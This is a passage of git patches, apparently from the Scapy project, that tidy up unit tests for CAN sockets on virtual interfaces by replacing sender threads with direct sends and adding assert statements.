sock1.sniff(timeout=0.1, verbose=False, count=2) +assert len(packets) == 2 sock1.close() -thread.join(timeout=5) = sniff with filtermask 0x1FFFFFFF and inverse filter sock1 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x10000000 | CAN_INV_FILTER, 'can_mask': 0x1fffffff}]) -if six.PY3: - thread = threading.Thread(target=sender) - packets = sock1.sniff(timeout=0.2, started_callback=thread.start, verbose=False) - len(packets) == 4 +sock2 = CANSocket(channel="vcan0") +sock2.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock2.close() + +packets = sock1.sniff(timeout=0.1, verbose=False, count=4) +assert len(packets) == 4 sock1.close() @@ -320,8 +280,8 @@ sock1 = CANSocket(channel="vcan0", receive_own_messages=True) tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') rx = None rx = sock1.sr1(tx, verbose=False, timeout=3) -tx == rx -tx.sent_time < rx.time and tx == rx and rx.time > 0 +assert tx == rx +assert tx.sent_time < rx.time and tx == rx and rx.time > 0 sock1.close() @@ -330,8 +290,8 @@ sock1.close() sock1 = CANSocket(channel="vcan0", receive_own_messages=True) tx = CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') rx = None -rx = sock1.sr(tx, timeout=1, verbose=False) -tx == rx[0][0][1] +rx = sock1.sr(tx, timeout=0.1, verbose=False) +assert tx == rx[0][0][1] + bridge and sniff tests @@ -339,19 +299,11 @@ tx == rx[0][0][1] bashCommand = "/bin/bash -c 'sudo ip link add name vcan1 type vcan; sudo ip link set dev vcan1 up'" -0 == os.system(bashCommand) +assert 0 == os.system(bashCommand) sock0 = CANSocket(channel='vcan0') sock1 = CANSocket(channel='vcan1') -def senderVCan0(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridge(): @@ -361,20 +313,25 @@ def bridge(): def pnr(pkt): return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) bridgeStarted.wait(timeout=5) +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) -packetsVCan1 = sock1.sniff(timeout=0.2, started_callback=threadSender.start, verbose=False) -len(packetsVCan1) == 6 +packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False, count=6) +assert len(packetsVCan1) == 6 -threadSender.join(timeout=5) threadBridge.join(timeout=5) +assert not threadBridge.is_alive() sock1.close() sock0.close() @@ -385,12 +342,6 @@ sock0.close() sock0 = CANSocket(channel='vcan0') sock1 = CANSocket(channel='vcan1') -def senderVCan1(): - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridge(): @@ -400,23 +351,27 @@ def bridge(): def pnr(pkt): return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False, count=4) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderVCan1) bridgeStarted.wait(timeout=5) -packetsVCan0 = sock0.sniff(timeout=0.2, started_callback=threadSender.start, verbose=False) -len(packetsVCan0) == 4 +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) + +packetsVCan0 = sock0.sniff(timeout=0.1, verbose=False, count=4) +assert len(packetsVCan0) == 4 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) +assert not threadBridge.is_alive() =bridge and sniff setup vcan0 vcan1 package forwarding both directions @@ -424,18 +379,6 @@ threadBridge.join(timeout=5) sock0 = CANSocket(channel='vcan0') sock1 = CANSocket(channel='vcan1') -def senderBothVCans(): - sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x30, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridge(): @@ -445,27 +388,36 @@ def bridge(): def pnr(pkt): return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False, count=10) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridge) threadBridge.start() -threadSender = threading.Thread(target=senderBothVCans) - bridgeStarted.wait(timeout=5) -packetsVCan0 = sock0.sniff(timeout=0.1, count=6, started_callback=threadSender.start, verbose=False) -packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False) +sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x25, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x20, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x30, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x80, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x40, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) + +packetsVCan0 = sock0.sniff(timeout=0.1, count=4, verbose=False) +packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False, count=6) -len(packetsVCan0) == 4 -len(packetsVCan1) == 6 +assert len(packetsVCan0) == 4 +assert len(packetsVCan1) == 6 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) +assert not threadBridge.is_alive() =bridge and sniff setup vcan1 package change @@ -473,15 +425,6 @@ threadBridge.join(timeout=5) sock0 = CANSocket(channel='vcan0') sock1 = CANSocket(channel='vcan1', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) -def senderVCan0(): - sleep(0.1) - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridgeWithPackageChangeVCan0ToVCan1(): @@ -493,24 +436,29 @@ def bridgeWithPackageChangeVCan0ToVCan1(): pkt.identifier = 0x10010000 return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.2, verbose=False, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithPackageChangeVCan0ToVCan1) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) bridgeStarted.wait(timeout=5) +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) -packetsVCan1 = sock1.sniff(timeout=0.2, started_callback=threadSender.start, verbose=False) -len(packetsVCan1) == 6 +packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False, count=6) +assert len(packetsVCan1) == 6 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) +assert not threadBridge.is_alive() =bridge and sniff setup vcan0 package change @@ -518,13 +466,6 @@ threadBridge.join(timeout=5) sock0 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) sock1 = CANSocket(channel='vcan1') -def senderVCan1(): - sleep(0.1) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithPackageChangeVCan1ToVCan0(): @@ -536,23 +477,25 @@ def bridgeWithPackageChangeVCan1ToVCan0(): pkt.identifier = 0x10010000 return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.2, verbose=False, count=4) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithPackageChangeVCan1ToVCan0) threadBridge.start() -threadSender = threading.Thread(target=senderVCan1) bridgeStarted.wait(timeout=5) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.2, started_callback=threadSender.start, verbose=False) -len(packetsVCan0) == 4 +packetsVCan0 = sock0.sniff(timeout=0.1, verbose=False, count=4) +assert len(packetsVCan0) == 4 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) =bridge and sniff setup vcan0 and vcan1 package change in both directions @@ -561,18 +504,6 @@ threadBridge.join(timeout=5) sock0 = CANSocket(channel='vcan0', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) sock1 = CANSocket(channel='vcan1', can_filters=[{'can_id': 0x10010000, 'can_mask': 0x1fffffff}]) -def senderBothVCans(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithPackageChangeBothDirections(): @@ -584,26 +515,33 @@ def bridgeWithPackageChangeBothDirections(): pkt.identifier = 0x10010000 return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, xfrm21=pnr, timeout=0.2, verbose=False, count=10) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithPackageChangeBothDirections) threadBridge.start() -threadSender = threading.Thread(target=senderBothVCans) bridgeStarted.wait(timeout=5) -threadSender.start() - -packetsVCan0 = sock0.sniff(timeout=0.1, verbose=False) -packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False) -len(packetsVCan0) == 4 -len(packetsVCan1) == 6 +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) + +packetsVCan0 = sock0.sniff(timeout=0.1, verbose=False, count=4) +packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False, count=6) +assert len(packetsVCan0) == 4 +assert len(packetsVCan1) == 6 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) =bridge and sniff setup vcan0 package remove @@ -612,14 +550,6 @@ threadBridge.join(timeout=5) sock0 = CANSocket(channel='vcan0') sock1 = CANSocket(channel='vcan1') -def senderVCan0(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - bridgeStarted = threading.Event() def bridgeWithRemovePackageFromVCan0ToVCan1(): @@ -633,25 +563,27 @@ def bridgeWithRemovePackageFromVCan0ToVCan1(): pkt = pkt return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnr, timeout=0.2, verbose=False, count=6) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithRemovePackageFromVCan0ToVCan1) threadBridge.start() -threadSender = threading.Thread(target=senderVCan0) - bridgeStarted.wait(timeout=5) -threadSender.start() +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) -packetsVCan1 = sock1.sniff(timeout=0.2, verbose=False) -len(packetsVCan1) == 5 +packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False, count=5) +assert len(packetsVCan1) == 5 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) =bridge and sniff setup vcan1 package remove @@ -660,12 +592,6 @@ threadBridge.join(timeout=5) sock0 = CANSocket(channel='vcan0') sock1 = CANSocket(channel='vcan1') -def senderVCan1(): - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithRemovePackageFromVCan1ToVCan0(): @@ -679,24 +605,25 @@ def bridgeWithRemovePackageFromVCan1ToVCan0(): pkt = pkt return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm21=pnr, timeout=0.2, verbose=False, count=4) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithRemovePackageFromVCan1ToVCan0) threadBridge.start() -threadSender = threading.Thread(target=senderVCan1) bridgeStarted.wait(timeout=5) -threadSender.start() +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) -packetsVCan0 = sock0.sniff(timeout=0.2, verbose=False) -len(packetsVCan0) == 3 +packetsVCan0 = sock0.sniff(timeout=0.1, verbose=False, count=3) +assert len(packetsVCan0) == 3 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) =bridge and sniff setup vcan0 and vcan1 package remove both directions @@ -705,18 +632,6 @@ threadBridge.join(timeout=5) sock0 = CANSocket(channel="vcan0") sock1 = CANSocket(channel="vcan1") -def senderBothVCans(): - sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) - bridgeStarted = threading.Event() def bridgeWithRemovePackageInBothDirections(): @@ -736,26 +651,34 @@ def bridgeWithRemovePackageInBothDirections(): pkt = pkt return pkt bridgeStarted.set() - bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnrA, xfrm21=pnrB, timeout=0.2, verbose=False) + bridge_and_sniff(if1=bSock0, if2=bSock1, xfrm12=pnrA, xfrm21=pnrB, timeout=0.2, verbose=False, count=10) bSock0.close() bSock1.close() threadBridge = threading.Thread(target=bridgeWithRemovePackageInBothDirections) threadBridge.start() -threadSender = threading.Thread(target=senderBothVCans) - bridgeStarted.wait(timeout=5) -packetsVCan0 = sock0.sniff(timeout=0.1, started_callback=threadSender.start, verbose=False) -packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False) +sock0.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10020000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10030000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10040000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock0.send(CAN(flags='extended', identifier=0x10000000, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10050000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) +sock1.send(CAN(flags='extended', identifier=0x10010000, length=8, data=b'\x01\x02\x03\x04\x05\x04\x05\x06')) + +packetsVCan0 = sock0.sniff(timeout=0.1, verbose=False, count=3) +packetsVCan1 = sock1.sniff(timeout=0.1, verbose=False, count=5) -len(packetsVCan0) == 3 -len(packetsVCan1) == 5 +assert len(packetsVCan0) == 3 +assert len(packetsVCan1) == 5 sock0.close() sock1.close() -threadSender.join(timeout=5) threadBridge.join(timeout=5) = Delete vcan interfaces From 959061964c86af2d25c27ee0911ba297a4677aad Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 31 Aug 2021 22:57:40 +0200 Subject: [PATCH 0638/1632] Cleanup unit tests for CANSockets (#3325) --- test/contrib/cansocket.uts | 100 +++++++++++++++---------------------- 1 file changed, 39 insertions(+), 61 deletions(-) diff --git a/test/contrib/cansocket.uts b/test/contrib/cansocket.uts index 2d6ae249ec1..002b2021a89 100644 --- a/test/contrib/cansocket.uts +++ b/test/contrib/cansocket.uts @@ -1,5 +1,5 @@ % Regression tests for compatibility between NativeCANSocket and PythonCANSocket -~ python3_only not_pypy vcan_socket needs_root linux disabled +~ python3_only not_pypy vcan_socket needs_root linux # More information at http://www.secdev.org/projects/UTscapy/ @@ -46,13 +46,10 @@ def sender(sock, msg): sock1 = NativeCANSocket(bustype='socketcan', channel='vcan0') sock2 = NativeCANSocket(bustype='socketcan', channel='vcan0') -thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=1,data=b'\x01'), )) -thread.start() -send_done.wait(timeout=1) +sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) rx = sock1.recv() sock1.close() sock2.close() -thread.join(timeout=5) assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') @@ -60,11 +57,8 @@ assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') with NativeCANSocket(bustype='socketcan', channel='vcan0') as sock1, \ NativeCANSocket(bustype='socketcan', channel='vcan0') as sock2: - thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=1,data=b'\x01'),)) - thread.start() - send_done.wait(timeout=1) + sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) rx = sock1.recv() - thread.join(timeout=5) assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') @@ -73,13 +67,10 @@ assert rx == CAN(identifier=0x7ff,length=1,data=b'\x01') sock1 = PythonCANSocket(bustype='socketcan', channel='vcan0') sock2 = PythonCANSocket(bustype='socketcan', channel='vcan0') -thread = threading.Thread(target=sender, args=(sock2, CAN(identifier=0x7ff,length=1,data=b'\x01'), )) -thread.start() -send_done.wait(timeout=1) 